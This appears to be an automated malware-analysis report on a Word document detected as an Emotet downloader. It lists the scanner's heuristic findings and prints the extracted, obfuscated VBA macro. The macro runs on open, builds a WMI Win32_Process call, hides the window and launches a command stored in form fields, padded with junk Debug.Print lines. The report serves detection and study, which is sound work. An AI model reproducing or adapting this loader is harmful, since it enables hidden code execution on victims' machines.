MALICIOUS
250
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set Eojw3iPu = GetObject(Y_HrXP5(Y_HrXP5(nUKNTNHj + "startup"))) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Eojw3iPu = GetObject(Y_HrXP5(Y_HrXP5(nUKNTNHj + "startup"))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3185 bytes |
SHA-256: c26416a315d0d1c2f40172a9691eaa75aebd41113326576d4e2f812fd6246f02 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "baO5AQ7"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "zM8ksqra, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b1jOhv, 1, 1, MSForms, TextBox"
Attribute VB_Name = "RH76qr"
Public Sub _
autoopen()
Debug.Print _
"83" + ("319") + ("T6SkzR7" + ("405" + "641") + "hMsJfq" + ("nIEXoz"));
Debug _
.Print "488" _
+ ("788") + ("hPlD3NoI" + ("757" + "842") + "IwZKKI6" + ("i7C2YT"));
Debug.Print "542" + ("648") + _
("ZZoAih" + ("581" + "339") + "T6T8I0Q" + ("hW3ri0U"));
dCMPMju (vGiAi2M)
Debug.Print _
"761" + ("636") + ("s6B11Aw0" + ("570" + "534") + "ULVjzb" + ("qt4kAL4d"));
Debug _
.Print "81" _
+ ("690") + ("rnldjZ" + ("878" + "438") + "P_02NC" + ("zUFUHIBb"));
Debug.Print "818" + ("659") + _
("u4PIMv" + ("593" + "875") + "dHLua5m" + ("sURr9Hjj"));
End Sub
Sub dCMPMju(iNTZLa)
nUKNTNHj = Y_HrXP5(Y_HrXP5("win" + Y_HrXP5(Y_HrXP5("mgmts:w")) + "in32_process"))
Debug.Print _
"224" + ("448") + ("LT192ZKX" + ("821" + "695") + "IL36KH" + ("QFXGi2zw"));
Debug _
.Print "347" _
+ ("984") + ("zhSGOfNw" + ("983" + "1") + "SQwWKj" + ("T9pI7t"));
Debug.Print "413" + ("992") + _
("B16PGn5" + ("774" + "673") + "O4TvUvSF" + ("rkrV04J"));
Set Eojw3iPu = GetObject(Y_HrXP5(Y_HrXP5(nUKNTNHj + "startup")))
Debug.Print _
"758" + ("555") + ("QFwzO7MC" + ("401" + "715") + "IjCwBHcU" + ("GlMatpOO"));
Debug _
.Print "986" _
+ ("52") + ("T0jiCOc" + ("87" + "530") + "Qq_NFfo" + ("wV9Kkw"));
Debug.Print "209" + ("535") + _
("luEhID" + ("273" + "463") + "t6c1L5" + ("XItW8XpC"));
Eojw3iPu _
.ShowWindow = (0 / 1)
Debug.Print _
"148" + ("909") + ("Ii1l6L" + ("895" + "523") + "H5irtaaz" + ("BclwXwk"));
Debug _
.Print "754" _
+ ("703") + ("FjMsnHCL" + ("97" + "596") + "HIZIGTk" + ("D3Rs9BO"));
Debug.Print "144" + ("599") + _
("zzBVW_FT" + ("373" + "607") + "tHcp9ndb" + ("fCs6_q"));
Debug.Print GetObject(Y_HrXP5(nUKNTNHj)).Create(ZcUWWG + Y_HrXP5("p") + baO5AQ7.b1jOhv + baO5AQ7.zM8ksqra + GORzvU9Y, TQjHss5, Eojw3iPu, hc_aNijP);
Debug.Print _
"300" + ("906") + ("cOZwAqo" + ("247" + "690") + "uK4lQvz3" + ("UiijQJM"));
Debug _
.Print "807" _
+ ("895") + ("U8GiEGn" + ("647" + "628") + "zjl1JR" + ("YCk5Iq"));
Debug.Print "863" + ("200") + _
("WbwDOjO" + ("779" + "48") + "JNO6KjC" + ("z7XsDdw"));
End Sub
Function Y_HrXP5(HacLi0X)
Debug.Print _
"994" + ("770") + ("ikqIW9jY" + ("410" + "559") + "o_uUQO" + ("Sc7z76"));
Debug _
.Print "230" _
+ ("132") + ("qYkFsj" + ("353" + "581") + "MfbDo3Y" + ("GzvQTUIp"));
Debug.Print "867" + ("208") + _
("TISuprrR" + ("218" + "967") + "r12B3LEj" + ("GSDIRw"));
Y_HrXP5 = T873WIU + HacLi0X + kirKI6
Debug.Print _
"233" + ("248") + ("FTlE2h" + ("837" + "621") + "PrE4PP" + ("vzIDLOQU"));
Debug _
.Print "137" _
+ ("187") + ("LzT_6W" + ("119" + "276") + "iJHfB_" + ("OR1iVs"));
Debug.Print "120" + ("57") + _
("pjYpVUD" + ("479" + "370") + "tI3czL_7" + ("NiA6_i"));
End Function
Attribute VB_Name = "t2Pudwt"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.